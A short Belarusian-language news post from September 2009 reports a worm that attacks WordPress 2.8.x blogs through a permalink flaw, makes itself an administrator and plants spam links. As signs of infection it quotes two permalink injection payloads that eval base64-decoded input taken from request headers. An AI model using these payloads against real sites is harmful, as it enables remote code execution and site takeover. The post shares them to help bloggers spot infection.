Месяц назад стала вядома аб новай крытычнай уразлівасці ў WordPress 2.8.3, якая дазваляе лёгка змяніць адміністратарскі пароль у выдаленым рэжыме. Пасля гэтага выйшаў WordPress 2.8.4, ліквідавалы гэтую ўразлівасць. Аднак, як апынулася, далёка не ўсе блогеры сочаць за абнаўленнямі.
У гэтыя выходныя вылілася сапраўдная эпідэмія новага віруса, які дзівіць блогі на рухавічку WordPress 2.8.3 і больш ранніх версій у галінцы 2.8. Чарвяк рэгіструецца ў блогу, запускае шкоднасны код праз структуру permalink і робіць сябе другім адмінам, потым запускае скрыпт для сцірання сябе са старонкі карыстачоў і пачынае дадаваць спам і спасылкі на шкоднасны кантэнт у архіўныя топікі. Прысутнасць шкодніка даволі складана выявіць адразу, тым больш калі ён яшчэ нічога не апублікаваў. Для гэтага трэба праверыць фид permalinks/rss на прысутнасць наступнага кода. або “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
або памылкі ‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’
Калі ёсць такі код або фид зламаны, то блог інфікаваны. Працэдура выдалення чарвяка ўяўляе сабой нетрывіяльную задачу .
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Масавае заражэнне блогаў на WordPress
7 верасня 2009
Каментароў (0)